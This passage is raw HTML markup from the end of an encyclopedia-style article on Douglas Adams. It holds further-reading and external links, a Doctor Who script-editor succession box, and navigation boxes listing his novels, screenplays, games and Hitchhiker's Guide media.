Times Educational Supplement, (4940), 27.</li>\n</ul>\n</div>\n<h3><span class=\"mw-headline\" id=\"Other\">Other</span></h3>\n<ul>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"https://web.archive.org/web/20110720193159/http://www.douglasadams.com/\">Adams's official web site</a> at the <a href=\"/wiki/Wayback_Machine\" title=\"Wayback Machine\">Wayback Machine</a> (archived 20 July 2011), established by him, and still operated by <a href=\"/wiki/The_Digital_Village\" title=\"The Digital Village\">The Digital Village</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"https://www.ted.com/speakers/douglas_adams\">Douglas Adams</a> at <a href=\"/wiki/TED_(conference)\" title=\"TED (conference)\">TED</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.biota.org/people/douglasadams/\">Douglas Adams speech at Digital Biota 2 (1998)</a> <a rel=\"nofollow\" class=\"external text\" href=\"http://www.biota.org/podcast/#DNA\">(The audio of the speech)</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.guardian.co.uk/books/2008/jun/09/douglasadams\">Guardian Books \"Author Page\"</a>, with profile and links to further articles.</li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"//worldcat.org/identities/lccn-n80-76765\">Works by or about Douglas Adams</a> in libraries (<a href=\"/wiki/WorldCat\" title=\"WorldCat\">WorldCat</a> catalog)</li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.vintagemacworld.com/iifx.html\">Douglas Adams & his Computer</a> article about his Mac IIfx</li>\n<li>BBC2 \"Omnibus\" tribute to Adams, presented by Kirsty Wark, 4 August 2001</li>\n<li>Mueller, Rick and Greengrass, Joel (2002). <i>Life, The Universe and Douglas Adams</i>, documentary.</li>\n<li>Simpson, M.J. (2001). <i>The Pocket Essential Hitchhiker's Guide</i>. <a href=\"/wiki/Special:BookSources/1903047404\" class=\"internal mw-magiclink-isbn\">ISBN 1-903047-40-4</a>. 
Updated April 2005 <a href=\"/wiki/Special:BookSources/1904048463\" class=\"internal mw-magiclink-isbn\">ISBN 1-904048-46-3</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.bbc.co.uk/programmes/p00fpvbm\">Special edition of BBC Book Club featuring Douglas Adams</a>, first broadcast 2 January 2000 on BBC Radio 4</li>\n</ul>\n<h2><span class=\"mw-headline\" id=\"External_links\">External links</span></h2>\n<table class=\"vertical-navbox nowraplinks infobox\" style=\"float:right;clear:right;width:auto;margin:0 0 1.0em 1.0em;background:#f9f9f9;border:1px solid #aaa;padding:0.2em;border-spacing:0.4em 0;text-align:center;line-height:1.4em;font-size:88%\">\n<tr>\n<td style=\"padding-top:0.4em;line-height:1.2em\"><a href=\"/wiki/Wikipedia:LIBRARY\" class=\"mw-redirect\" title=\"Wikipedia:LIBRARY\">Library resources</a> about<br />\n<b>Douglas Adams</b>\n<hr /></td>\n</tr>\n<tr>\n<td class=\"plainlist\" style=\"padding:0 0.1em 0.4em;text-align:left;\">\n<ul>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?st=viaf&su=113230702\">Resources in your library</a></li>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?st=viaf&su=113230702&library=0CHOOSE0\">Resources in other libraries</a></li>\n</ul>\n</td>\n</tr>\n<tr>\n<th style=\"padding:0.1em\">By Douglas Adams</th>\n</tr>\n<tr>\n<td class=\"plainlist\" style=\"padding:0 0.1em 0.4em;text-align:left;\">\n<ul>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?at=viaf&au=113230702\">Resources in your library</a></li>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?at=viaf&au=113230702&library=0CHOOSE0\">Resources in other libraries</a></li>\n</ul>\n</td>\n</tr>\n</table>\n<div id=\"section_SpokenWikipedia\" class=\"infobox sisterproject noprint\">\n<div style=\"text-align: center;\"><b>Listen to this article (2 parts) </b>· <a href=\"/wiki/File:Douglas_Adams_Part_1.ogg\" title=\"File:Douglas Adams 
Part 1.ogg\">(info)</a></div>\n<div style=\"text-align: center; font-size: 90%; margin-bottom: .4em;\"><i><a href=\"//upload.wikimedia.org/wikipedia/commons/4/4a/Douglas_Adams_Part_1.ogg\" class=\"internal\" title=\"Douglas Adams Part 1.ogg\">Part 1</a> • <a href=\"//upload.wikimedia.org/wikipedia/commons/c/c6/Douglas_Adams_Part_2.ogg\" class=\"internal\" title=\"Douglas Adams Part 2.ogg\">Part 2</a></i></div>\n<div style=\"float: left; margin-left: 5px;\">\n<div class=\"floatnone\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/4/47/Sound-icon.svg/45px-Sound-icon.svg.png\" title=\"Spoken Wikipedia\" width=\"45\" height=\"34\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/4/47/Sound-icon.svg/68px-Sound-icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/4/47/Sound-icon.svg/90px-Sound-icon.svg.png 2x\" data-file-width=\"128\" data-file-height=\"96\" /></div>\n</div>\n<div style=\"font-size: xx-small; line-height: 1.6em; margin-left: 60px;\">This audio file was created from a revision of the \"<span class=\"fn\">Douglas Adams</span>\" article dated 2006-02-11, and does not reflect subsequent edits to the article. 
(<a href=\"/wiki/Wikipedia:Media_help\" title=\"Wikipedia:Media help\">Audio help</a>)</div>\n<div style=\"text-align: center; clear: both\"><b><a href=\"/wiki/Wikipedia:Spoken_articles\" title=\"Wikipedia:Spoken articles\">More spoken articles</a></b></div>\n</div>\n<ul>\n<li><a href=\"/wiki/File:Commons-logo.svg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/12px-Commons-logo.svg.png\" width=\"12\" height=\"16\" class=\"noviewer\" srcset=\"//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/18px-Commons-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/24px-Commons-logo.svg.png 2x\" data-file-width=\"1024\" data-file-height=\"1376\" /></a> Media related to <a href=\"https://commons.wikimedia.org/wiki/Category:Douglas_Adams\" class=\"extiw\" title=\"commons:Category:Douglas Adams\">Douglas Adams</a> at Wikimedia Commons</li>\n<li><a href=\"/wiki/File:Wikiquote-logo.svg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/13px-Wikiquote-logo.svg.png\" width=\"13\" height=\"16\" class=\"noviewer\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/20px-Wikiquote-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/27px-Wikiquote-logo.svg.png 2x\" data-file-width=\"300\" data-file-height=\"355\" /></a> Quotations related to <a href=\"https://en.wikiquote.org/wiki/Special:Search/Douglas_Adams\" class=\"extiw\" title=\"wikiquote:Special:Search/Douglas Adams\">Douglas Adams</a> at Wikiquote</li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"https://www.findagrave.com/cgi-bin/fg.cgi?page=gr&GRid=22814\">Douglas Adams</a> at <i><a href=\"/wiki/Find_a_Grave\" title=\"Find a Grave\">Find a Grave</a></i></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.imdb.com/name/nm0010930/\">Douglas Adams</a> at the <a 
href=\"/wiki/IMDb\" title=\"IMDb\">Internet Movie Database</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://towelday.org/\">Towel Day, 25 May</a></li>\n</ul>\n<table class=\"wikitable succession-box\" style=\"margin:0.5em auto; font-size:95%;clear:both;\">\n<tr style=\"text-align:center;\">\n<td style=\"width:30%;\" rowspan=\"1\">Preceded by<br />\n<span style=\"font-weight: bold\"><a href=\"/wiki/Anthony_Read\" title=\"Anthony Read\">Anthony Read</a></span></td>\n<td style=\"width: 40%; text-align: center;\" rowspan=\"1\"><b><i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i> script editor</b><br />\n1979–80</td>\n<td style=\"width: 30%; text-align: center;\" rowspan=\"1\">Succeeded by<br />\n<span style=\"font-weight: bold\"><a href=\"/wiki/Christopher_H._Bidmead\" title=\"Christopher H. Bidmead\">Christopher H. Bidmead</a></span></td>\n</tr>\n</table>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Works_by_Douglas_Adams\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible autocollapse navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:Douglas_Adams\" title=\"Template:Douglas Adams\"><abbr title=\"View this template\" style=\";;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:Douglas_Adams\" title=\"Template talk:Douglas Adams\"><abbr title=\"Discuss this template\" style=\";;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:Douglas_Adams&action=edit\"><abbr title=\"Edit this template\" style=\";;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Works_by_Douglas_Adams\" 
style=\"font-size:114%\">Works by <strong class=\"selflink\">Douglas Adams</strong></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Novels</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(novel)\" title=\"The Hitchhiker's Guide to the Galaxy (novel)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/The_Restaurant_at_the_End_of_the_Universe\" title=\"The Restaurant at the End of the Universe\">The Restaurant at the End of the Universe</a></i></li>\n<li><i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i></li>\n<li><i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i></li>\n<li><i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i></li>\n<li><i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i></li>\n<li><i><a href=\"/wiki/Mostly_Harmless\" title=\"Mostly Harmless\">Mostly Harmless</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Short stories</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li>\"<a href=\"/wiki/The_Private_Life_of_Genghis_Khan\" title=\"The Private Life of Genghis Khan\">The Private Life of Genghis Khan</a>\"</li>\n<li>\"<a 
href=\"/wiki/Young_Zaphod_Plays_It_Safe\" title=\"Young Zaphod Plays It Safe\">Young Zaphod Plays It Safe</a>\"</li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Books</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts\">The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts</a></i></li>\n<li><i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i></li>\n<li><i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i></li>\n<li><i><a href=\"/wiki/Douglas_Adams%27s_Guide_to_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Douglas Adams's Guide to The Hitchhiker's Guide to the Galaxy\">Douglas Adams's Guide to The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Screenplays</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i>Monty Python's Flying Circus</i>\n<ul>\n<li>\"<a href=\"/wiki/Patient_Abuse\" title=\"Patient Abuse\">Patient Abuse</a>\"</li>\n</ul>\n</li>\n<li><i><a href=\"/wiki/Out_of_the_Trees\" title=\"Out of the Trees\">Out of the 
Trees</a></i></li>\n<li><i>Doctor Who</i>\n<ul>\n<li><i><a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a></i></li>\n<li><i><a href=\"/wiki/City_of_Death\" title=\"City of Death\">City of Death</a></i></li>\n<li><i><a href=\"/wiki/Shada_(Doctor_Who)\" title=\"Shada (Doctor Who)\">Shada</a></i></li>\n</ul>\n</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">The Hitchhiker's Guide to the Galaxy</a></i> (TV series)</li>\n<li><i><a href=\"/wiki/Hyperland\" title=\"Hyperland\">Hyperland</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">The Hitchhiker's Guide to the Galaxy</a></i> (film)</li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Video games</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(video_game)\" title=\"The Hitchhiker's Guide to the Galaxy (video game)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/Bureaucracy_(video_game)\" title=\"Bureaucracy (video game)\">Bureaucracy</a></i></li>\n<li><i><a href=\"/wiki/Starship_Titanic\" title=\"Starship Titanic\">Starship Titanic</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">See also</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The 
Hitchhiker's Guide to the Galaxy</a></i> (series)</li>\n<li><i><a href=\"/wiki/Douglas_Adams_at_the_BBC\" title=\"Douglas Adams at the BBC\">Douglas Adams at the BBC</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Future\" title=\"The Hitchhiker's Guide to the Future\">The Hitchhiker's Guide to the Future</a></i> (BBC radio series)</li>\n<li><i><a href=\"/wiki/The_Utterly_Utterly_Merry_Comic_Relief_Christmas_Book\" title=\"The Utterly Utterly Merry Comic Relief Christmas Book\">The Utterly Utterly Merry Comic Relief Christmas Book</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Douglas_Adams.27s_The_Hitchhiker.27s_Guide_to_the_Galaxy\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible autocollapse navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Template:The Hitchhiker's Guide to the Galaxy\"><abbr title=\"View this template\" style=\";;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Template talk:The Hitchhiker's Guide to the Galaxy\"><abbr title=\"Discuss this template\" style=\";;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:The_Hitchhiker%27s_Guide_to_the_Galaxy&action=edit\"><abbr title=\"Edit this template\" style=\";;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Douglas_Adams.27s_The_Hitchhiker.27s_Guide_to_the_Galaxy\" style=\"font-size:114%\"><strong class=\"selflink\">Douglas Adams's</strong> <i><a 
href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"The Hitchhiker's Guide to the Galaxy\">The Hitchhiker's Guide to the Galaxy</a></i></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Books</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Main series</div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(novel)\" title=\"The Hitchhiker's Guide to the Galaxy (novel)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/The_Restaurant_at_the_End_of_the_Universe\" title=\"The Restaurant at the End of the Universe\">The Restaurant at the End of the Universe</a></i></li>\n<li><i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i></li>\n<li><i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i></li>\n<li><i><a href=\"/wiki/Mostly_Harmless\" title=\"Mostly Harmless\">Mostly Harmless</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">Related works</div>\n</th>\n<td class=\"navbox-list navbox-even\" 
style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li>\"<a href=\"/wiki/Young_Zaphod_Plays_It_Safe\" title=\"Young Zaphod Plays It Safe\">Young Zaphod Plays It Safe</a>\"</li>\n<li><i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"padding-left:0;padding-right:0;\">\n<div style=\"padding:0em 0.75em;\">by <a href=\"/wiki/Eoin_Colfer\" title=\"Eoin Colfer\">Eoin Colfer</a></div>\n</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"><i><a href=\"/wiki/And_Another_Thing..._(novel)\" title=\"And Another Thing... (novel)\">And Another Thing...</a></i></div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Media</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">Radio series</a>\n<ul>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Primary_and_Secondary_Phases\" title=\"The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases\">Phases 1 & 2</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_Tertiary_to_Quintessential_Phases\" title=\"The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases\">Phases 3, 4 & 5</a></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: 
The Original Radio Scripts\">The Original Radio Scripts</a></i></li>\n</ul>\n</li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">TV series</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">Film</a></li>\n<li><a href=\"/wiki/Timeline_of_The_Hitchhiker%27s_Guide_to_the_Galaxy_versions\" title=\"Timeline of The Hitchhiker's Guide to the Galaxy versions\">Timeline of <i>The Hitchhiker's Guide to the Galaxy</i> versions</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_cast_lists\" title=\"The Hitchhiker's Guide to the Galaxy cast lists\">Cast lists</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Games</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(video_game)\" title=\"The Hitchhiker's Guide to the Galaxy (video game)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Companion<br />\nmedia</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Don%27t_Panic:_The_Official_Hitchhiker%27s_Guide_to_the_Galaxy_Companion\" title=\"Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion\">Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion</a></i></li>\n<li><i><a href=\"/wiki/Douglas_Adams%27s_Guide_to_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Douglas Adams's Guide to 
The Hitchhiker's Guide to the Galaxy\">Douglas Adams's Guide to The Hitchhiker's Guide to the Galaxy</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Characters</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Arthur_Dent\" title=\"Arthur Dent\">Arthur Dent</a></li>\n<li><a href=\"/wiki/Ford_Prefect_(character)\" title=\"Ford Prefect (character)\">Ford Prefect</a></li>\n<li><a href=\"/wiki/Zaphod_Beeblebrox\" title=\"Zaphod Beeblebrox\">Zaphod Beeblebrox</a></li>\n<li><a href=\"/wiki/Marvin_(character)\" title=\"Marvin (character)\">Marvin the Paranoid Android</a></li>\n<li><a href=\"/wiki/Trillian_(character)\" title=\"Trillian (character)\">Trillian</a></li>\n<li><a href=\"/wiki/Slartibartfast\" title=\"Slartibartfast\">Slartibartfast</a></li>\n<li><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(fictional)\" title=\"The Hitchhiker's Guide to the Galaxy (fictional)\">The <i>Guide</i></a></li>\n<li><a href=\"/wiki/List_of_minor_The_Hitchhiker%27s_Guide_to_the_Galaxy_characters\" title=\"List of minor The Hitchhiker's Guide to the Galaxy characters\">Minor characters</a></li>\n<li><a href=\"/wiki/List_of_races_and_species_in_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"List of races and species in The Hitchhiker's Guide to the Galaxy\">Races and species</a></li>\n<li><a href=\"/wiki/Vogon\" title=\"Vogon\">Vogons</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Miscellanea</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a 
href=\"/wiki/Phrases_from_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Phrases from The Hitchhiker's Guide to the Galaxy\">Phrases</a></li>\n<li><a href=\"/wiki/Places_in_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Places in The Hitchhiker's Guide to the Galaxy\">Places</a></li>\n<li><a href=\"/wiki/Technology_in_The_Hitchhiker%27s_Guide_to_the_Galaxy\" title=\"Technology in The Hitchhiker's Guide to the Galaxy\">Technology</a></li>\n<li><a href=\"/wiki/Somebody_else%27s_problem\" title=\"Somebody else's problem\">Somebody else's problem</a></li>\n<li><i><a href=\"/wiki/Encyclopedia_Galactica\" title=\"Encyclopedia Galactica\">Encyclopedia Galactica</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">In culture</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/H2g2\" title=\"H2g2\">h2g2</a></li>\n<li><a href=\"/wiki/Hitchcon\" title=\"Hitchcon\">Hitchcon</a></li>\n<li><a href=\"/wiki/Towel_Day\" title=\"Towel Day\">Towel Day</a></li>\n<li>\"<a href=\"/wiki/Journey_of_the_Sorcerer\" class=\"mw-redirect\" title=\"Journey of the Sorcerer\">Journey of the Sorcerer</a>\"</li>\n<li><a href=\"/wiki/18610_Arthurdent\" title=\"18610 Arthurdent\">18610 Arthurdent</a></li>\n<li><a href=\"/wiki/25924_Douglasadams\" title=\"25924 Douglasadams\">25924 Douglasadams</a></li>\n<li><i><a href=\"/wiki/Bidenichthys_beeblebroxi\" title=\"Bidenichthys beeblebroxi\">Bidenichthys beeblebroxi</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<td class=\"navbox-abovebelow hlist\" colspan=\"2\">\n<div>\n<ul>\n<li><a href=\"/wiki/Portal:Hitchhiker%27s\" title=\"Portal:Hitchhiker's\">Portal</a></li>\n<li><a href=\"/wiki/Category:The_Hitchhiker%27s_Guide_to_the_Galaxy\" 
